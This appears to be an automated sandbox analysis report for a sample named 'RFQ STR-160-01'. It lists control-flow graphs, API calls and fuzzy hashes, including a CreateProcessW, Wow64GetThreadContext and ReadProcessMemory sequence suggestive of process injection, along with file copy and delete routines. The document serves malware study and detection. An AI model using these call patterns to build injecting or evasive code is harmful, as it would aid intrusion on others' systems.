              control_flow_graph 1324 17925e0-179268e call 1790000 1327 1792695-17926bb call 17934f0 CreateFileW 1324->1327 1330 17926bd 1327->1330 1331 17926c2-17926d2 1327->1331 1332 179280d-1792811 1330->1332 1339 17926d9-17926f3 VirtualAlloc 1331->1339 1340 17926d4 1331->1340 1333 1792853-1792856 1332->1333 1334 1792813-1792817 1332->1334 1336 1792859-1792860 1333->1336 1337 1792819-179281c 1334->1337 1338 1792823-1792827 1334->1338 1343 1792862-179286d 1336->1343 1344 17928b5-17928ca 1336->1344 1337->1338 1345 1792829-1792833 1338->1345 1346 1792837-179283b 1338->1346 1341 17926fa-1792711 ReadFile 1339->1341 1342 17926f5 1339->1342 1340->1332 1347 1792718-1792758 VirtualAlloc 1341->1347 1348 1792713 1341->1348 1342->1332 1349 179286f 1343->1349 1350 1792871-179287d 1343->1350 1351 17928da-17928e2 1344->1351 1352 17928cc-17928d7 VirtualFree 1344->1352 1345->1346 1353 179284b 1346->1353 1354 179283d-1792847 1346->1354 1355 179275a 1347->1355 1356 179275f-179277a call 1793740 1347->1356 1348->1332 1349->1344 1357 179287f-179288f 1350->1357 1358 1792891-179289d 1350->1358 1352->1351 1353->1333 1354->1353 1355->1332 1364 1792785-179278f 1356->1364 1360 17928b3 1357->1360 1361 17928aa-17928b0 1358->1361 1362 179289f-17928a8 1358->1362 1360->1336 1361->1360 1362->1360 1365 1792791-17927c0 call 1793740 1364->1365 1366 17927c2-17927d6 call 1793550 1364->1366 1365->1364 1371 17927d8 1366->1371 1372 17927da-17927de 1366->1372 1371->1332 1374 17927ea-17927ee 1372->1374 1375 17927e0-17927e4 FindCloseChangeNotification 1372->1375 1376 17927fe-1792807 1374->1376 1377 17927f0-17927fb VirtualFree 1374->1377 1375->1374 1376->1327 1376->1332 1377->1376
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017926B1
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017928D7
              Memory Dump Source
              • Source File: 00000000.00000002.2140916641.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1790000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
              • Instruction ID: cdec883a574434dcf9985dbaaf03a2c8700b9495384f3918b244775ef4e8b50d
              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
              • Instruction Fuzzy Hash: 40A10774E40209EBDF14DFA4D894BEEFBB5BF48304F208199E601BB281D7759A45CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1388 592c63-592cd3 CreateWindowExW * 2 ShowWindow * 2
              APIs
              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00592C91
              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00592CB2
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CC6
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CCF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: 404c96ed9f2e79579d8ecc2e71ee4916c738219dab465c110fdad52f73775734
              • Instruction ID: 43e2f2c33f3deb6f8c01132c035249e95a1168a0b53e6818fd834b587be86179
              • Opcode Fuzzy Hash: 404c96ed9f2e79579d8ecc2e71ee4916c738219dab465c110fdad52f73775734
              • Instruction Fuzzy Hash: 83F0D0759402907BE77117176C08E7B2E7FD7CBF60B051059F901E66A0C6A11851DEB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1503 17923b0-17924e0 call 1790000 call 17922a0 CreateFileW 1510 17924e2 1503->1510 1511 17924e7-17924f7 1503->1511 1512 1792597-179259c 1510->1512 1514 17924f9 1511->1514 1515 17924fe-1792518 VirtualAlloc 1511->1515 1514->1512 1516 179251a 1515->1516 1517 179251c-1792533 ReadFile 1515->1517 1516->1512 1518 1792535 1517->1518 1519 1792537-1792571 call 17922e0 call 17912a0 1517->1519 1518->1512 1524 179258d-1792595 ExitProcess 1519->1524 1525 1792573-1792588 call 1792330 1519->1525 1524->1512 1525->1524
              APIs
                • Part of subcall function 017922A0: Sleep.KERNELBASE(000001F4), ref: 017922B1
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017924D6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140916641.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1790000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateFileSleep
              • String ID: CBM4BETXRMZHCA4
              • API String ID: 2694422964-2403579438
              • Opcode ID: 98c01af57c05f7a79266275ee8232e46de10057b9ab6f171583dcf97b3a8c352
              • Instruction ID: 474bd488094f0079157f44c98cc7ceb4bdea93bb41e2d1a62a7b47a18589328f
              • Opcode Fuzzy Hash: 98c01af57c05f7a79266275ee8232e46de10057b9ab6f171583dcf97b3a8c352
              • Instruction Fuzzy Hash: 1751A370D04249EBEF11EBA4D855BEEFB75AF18300F104199E609BB2C1D7791B48CBA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1527 602947-6029b9 call 5d1f50 call 6025d6 call 5afe0b call 595722 call 60274e call 59511f call 5b5232 1542 602a6c-602a73 call 602e66 1527->1542 1543 6029bf-6029c6 call 602e66 1527->1543 1548 602a75-602a77 1542->1548 1549 602a7c 1542->1549 1543->1548 1550 6029cc-602a6a call 5bd583 call 5b4983 call 5b9038 call 5bd583 call 5b9038 * 2 1543->1550 1551 602cb6-602cb7 1548->1551 1553 602a7f-602b3a call 5950f5 * 8 call 603017 call 5be5eb 1549->1553 1550->1553 1554 602cd5-602cdb 1551->1554 1592 602b43-602b5e call 602792 1553->1592 1593 602b3c-602b3e 1553->1593 1557 602cf0-602cf6 1554->1557 1558 602cdd-602ced call 5afdcd call 5afe14 1554->1558 1558->1557 1596 602bf0-602bfc call 5be678 1592->1596 1597 602b64-602b6c 1592->1597 1593->1551 1604 602c12-602c16 1596->1604 1605 602bfe-602c0d DeleteFileW 1596->1605 1599 602b74 1597->1599 1600 602b6e-602b72 1597->1600 1601 602b79-602b97 call 5950f5 1599->1601 1600->1601 1609 602bc1-602bd7 call 60211d call 5bdbb3 1601->1609 1610 602b99-602b9e 1601->1610 1607 602c91-602ca5 CopyFileW 1604->1607 1608 602c18-602c7e call 6025d6 call 5bd2eb * 2 call 6022ce 1604->1608 1605->1551 1612 602ca7-602cb4 DeleteFileW 1607->1612 1613 602cb9-602ccf DeleteFileW call 602fd8 1607->1613 1608->1613 1632 602c80-602c8f DeleteFileW 1608->1632 1627 602bdc-602be7 1609->1627 1615 602ba1-602bb4 call 6028d2 1610->1615 1612->1551 1618 602cd4 1613->1618 1625 602bb6-602bbf 1615->1625 1618->1554 1625->1609 1627->1597 1629 602bed 1627->1629 1629->1596 1632->1551
              APIs
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602C05
              • DeleteFileW.KERNEL32(?), ref: 00602C87
              • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00602C9D
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CAE
              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CC0
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: File$Delete$Copy
              • String ID:
              • API String ID: 3226157194-0
              • Opcode ID: a81f5857efce65ff5da499a96b87a17bf1d801876e8cd07da89b7e0f83b12843
              • Instruction ID: 8bd88c812560d1a12b7be4a17967a1525dfa0973bca76b2bd9cf12c729ef750c
              • Opcode Fuzzy Hash: a81f5857efce65ff5da499a96b87a17bf1d801876e8cd07da89b7e0f83b12843
              • Instruction Fuzzy Hash: 07B15E71D4011AABDF25DBA4CC99EDFBB7DFF48350F1040A6FA09A6181EB309A448F61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1907 5c5aa9-5c5ace 1908 5c5ad7-5c5ad9 1907->1908 1909 5c5ad0-5c5ad2 1907->1909 1911 5c5afa-5c5b1f 1908->1911 1912 5c5adb-5c5af5 call 5bf2c6 call 5bf2d9 call 5c27ec 1908->1912 1910 5c5ca5-5c5cb4 call 5b0a8c 1909->1910 1915 5c5b26-5c5b2c 1911->1915 1916 5c5b21-5c5b24 1911->1916 1912->1910 1918 5c5b2e-5c5b46 call 5bf2c6 call 5bf2d9 call 5c27ec 1915->1918 1919 5c5b4b 1915->1919 1916->1915 1917 5c5b4e-5c5b53 1916->1917 1923 5c5b64-5c5b6d call 5c564e 1917->1923 1924 5c5b55-5c5b61 call 5c9424 1917->1924 1956 5c5c9c-5c5c9f 1918->1956 1919->1917 1934 5c5b6f-5c5b71 1923->1934 1935 5c5ba8-5c5bba 1923->1935 1924->1923 1938 5c5b95-5c5b9e call 5c542e 1934->1938 1939 5c5b73-5c5b78 1934->1939 1941 5c5bbc-5c5bc2 1935->1941 1942 5c5c02-5c5c23 WriteFile 1935->1942 1955 5c5ba3-5c5ba6 1938->1955 1943 5c5c6c-5c5c7e 1939->1943 1944 5c5b7e-5c5b8b call 5c55e1 1939->1944 1949 5c5bc4-5c5bc7 1941->1949 1950 5c5bf2-5c5c00 call 5c56c4 1941->1950 1947 5c5c2e 1942->1947 1948 5c5c25-5c5c2b GetLastError 1942->1948 1953 5c5c89-5c5c99 call 5bf2d9 call 5bf2c6 1943->1953 1954 5c5c80-5c5c83 1943->1954 1965 5c5b8e-5c5b90 1944->1965 1957 5c5c31-5c5c3c 1947->1957 1948->1947 1958 5c5bc9-5c5bcc 1949->1958 1959 5c5be2-5c5bf0 call 5c5891 1949->1959 1950->1955 1953->1956 1954->1953 1963 5c5c85-5c5c87 1954->1963 1955->1965 1969 5c5ca4 1956->1969 1966 5c5c3e-5c5c43 1957->1966 1967 5c5ca1 1957->1967 1958->1943 1968 5c5bd2-5c5be0 call 5c57a3 1958->1968 1959->1955 1963->1969 1965->1957 1972 5c5c69 1966->1972 1973 5c5c45-5c5c4a 1966->1973 1967->1969 1968->1955 1969->1910 1972->1943 1976 5c5c4c-5c5c5e call 5bf2d9 call 5bf2c6 1973->1976 1977 5c5c60-5c5c67 call 5bf2a3 1973->1977 1976->1956 1977->1956
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: JOY
              • API String ID: 0-3877268382
              • Opcode ID: bbbef1843c5376be108cbbcddcfea95bb70fa7a1f6834556eddf13cf39999b4b
              • Instruction ID: 15b5e4b09fa48441ed0c48ccc386f69c0a232c19c181091166a4826616c3eac8
              • Opcode Fuzzy Hash: bbbef1843c5376be108cbbcddcfea95bb70fa7a1f6834556eddf13cf39999b4b
              • Instruction Fuzzy Hash: BA519B75900A0AAECB219FE4CD49FEEBFB8FF45314F14045DE405A7291E671AD818B61
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B40
              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B61
              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B83
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 3677997916-824357125
              • Opcode ID: 7fcfa8af53f3e7603ad1a063600ff7e35175dbe5daa611116f889b298344bfa3
              • Instruction ID: 7f9410f4922ddcb2c364e261befd4a3a4b7dc6b63672aa11013b1d19e8f5f9cf
              • Opcode Fuzzy Hash: 7fcfa8af53f3e7603ad1a063600ff7e35175dbe5daa611116f889b298344bfa3
              • Instruction Fuzzy Hash: 00112AB5510208FFDF208FA5DC44EAEBBBAFF04754B104859A805D7210E2719E4197A0
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01791A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01791AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01791B13
              Memory Dump Source
              • Source File: 00000000.00000002.2140916641.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1790000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
              • Instruction ID: 4d9e6c689086589d299c15557b044bab8db4b913ee0ffeb7c3f283b51acb0407
              • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
              • Instruction Fuzzy Hash: B6624B30A14259DBEB24CFA4D840BDEB372EF58300F5091A9D20DEB394E7799E85CB59
              APIs
              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005D33A2
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00593A04
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: IconLoadNotifyShell_String_wcslen
              • String ID: Line:
              • API String ID: 2289894680-1585850449
              • Opcode ID: cac5bda270aa76a501a3bda43edb156849cd4a3f228e581ee4579427b073ed97
              • Instruction ID: dd26d2d2295345bb3ef597de0abdc2f3b5b492394ab03118bad6213752d157e8
              • Opcode Fuzzy Hash: cac5bda270aa76a501a3bda43edb156849cd4a3f228e581ee4579427b073ed97
              • Instruction Fuzzy Hash: 3931D671408305ABCB21EB14DC49BEFBBD8BB81710F14492EF59A97191EB709648C7D2
              APIs
              • GetOpenFileNameW.COMDLG32(?), ref: 005D2C8C
                • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                • Part of subcall function 00592DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Name$Path$FileFullLongOpen
              • String ID: X$`ee
              • API String ID: 779396738-2358545003
              • Opcode ID: fc9a4bc9f912355071a73594b751cb022cb4e0fa6bfb043463ab7634e1f44bff
              • Instruction ID: 100053c153859e9f9e6a129e2944cb1637086a8920e4c003926bb8984363c83c
              • Opcode Fuzzy Hash: fc9a4bc9f912355071a73594b751cb022cb4e0fa6bfb043463ab7634e1f44bff
              • Instruction Fuzzy Hash: 4721A171A00258ABCF019F94C849BEE7FF9AF88305F00805AE405A7241EBB45A498FA1
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                • Part of subcall function 005B32A4: RaiseException.KERNEL32(?,?,?,005B068A,?,00661444,?,?,?,?,?,?,005B068A,00591129,00658738,00591129), ref: 005B3304
              • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Exception@8Throw$ExceptionRaise
              • String ID: Unknown exception
              • API String ID: 3476068407-410509341
              • Opcode ID: febb2d0ef39b502ffccb8b49397f18f6e4f81c6718138d5786ed69ffeb770abf
              • Instruction ID: 7f36aa44a1a91b14b2072166d6d42be25c9c30771dc5e6b32bb0a6d656990f77
              • Opcode Fuzzy Hash: febb2d0ef39b502ffccb8b49397f18f6e4f81c6718138d5786ed69ffeb770abf
              • Instruction Fuzzy Hash: 12F0623490020E778F15BAA4DC4ACDF7F6DBE80750B604531B914A69D2EF71FA69CA81
              APIs
              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0060302F
              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00603044
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Temp$FileNamePath
              • String ID: aut
              • API String ID: 3285503233-3010740371
              • Opcode ID: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
              • Instruction ID: 24bf46b3e2feeba08d3e69509342f3732bd2ad64445131a2b16015b8e0d82fd6
              • Opcode Fuzzy Hash: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
              • Instruction Fuzzy Hash: 0CD05E72501328A7DB30A7A4AC0EFCB3A6CDB04761F4002A1BA55E20A1DEB09A85CAD0
              APIs
              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006182F5
              • TerminateProcess.KERNEL32(00000000), ref: 006182FC
              • FreeLibrary.KERNEL32(?,?,?,?), ref: 006184DD
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$CurrentFreeLibraryTerminate
              • String ID:
              • API String ID: 146820519-0
              • Opcode ID: 4d76f86269e4c904f380e9028ab67a00125a5e3c1c5cba99110f91bae317630d
              • Instruction ID: 57c92640483a3433faac1e0a9fd95d87ac40aa1bc41dfd26d3d8ed1ec92f39c5
              • Opcode Fuzzy Hash: 4d76f86269e4c904f380e9028ab67a00125a5e3c1c5cba99110f91bae317630d
              • Instruction Fuzzy Hash: 6D125D719083419FC714DF28C484B9ABBE6BF89314F18895DE8998B352DB31ED85CB92
              APIs
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
                • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
                • Part of subcall function 00591B4A: RegisterWindowMessageW.USER32(00000004,?,005912C4), ref: 00591BA2
              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0059136A
              • OleInitialize.OLE32 ref: 00591388
              • CloseHandle.KERNEL32(00000000,00000000), ref: 005D24AB
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
              • String ID:
              • API String ID: 1986988660-0
              • Opcode ID: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
              • Instruction ID: c3002673df5e6537fcc073fb9362de843f1cbc824a56888b993cddfe1044868b
              • Opcode Fuzzy Hash: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
              • Instruction Fuzzy Hash: EC71C8F49116028FC784DF7AA859659BEE3BB8A35471CA22ED00BCF261EBB04441CF95
              APIs
              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0059556D
              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0059557D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e031d349a9ef737859dffe61cb08297cda4997424bf8857ec7f01a76f6b083e7
              • Instruction ID: 51e91ba620b90bbdbc7033e0e5b7ea089f18a5c0197e1f3e44ea598afede06bb
              • Opcode Fuzzy Hash: e031d349a9ef737859dffe61cb08297cda4997424bf8857ec7f01a76f6b083e7
              • Instruction Fuzzy Hash: F0316F71A0060AEFDF15CF28C880B9DBBB6FB44314F15862AE91997241E771FDA4CB90
              APIs
              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,005C85CC,?,00658CC8,0000000C), ref: 005C8704
              • GetLastError.KERNEL32(?,005C85CC,?,00658CC8,0000000C), ref: 005C870E
              • __dosmaperr.LIBCMT ref: 005C8739
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
              • String ID:
              • API String ID: 490808831-0
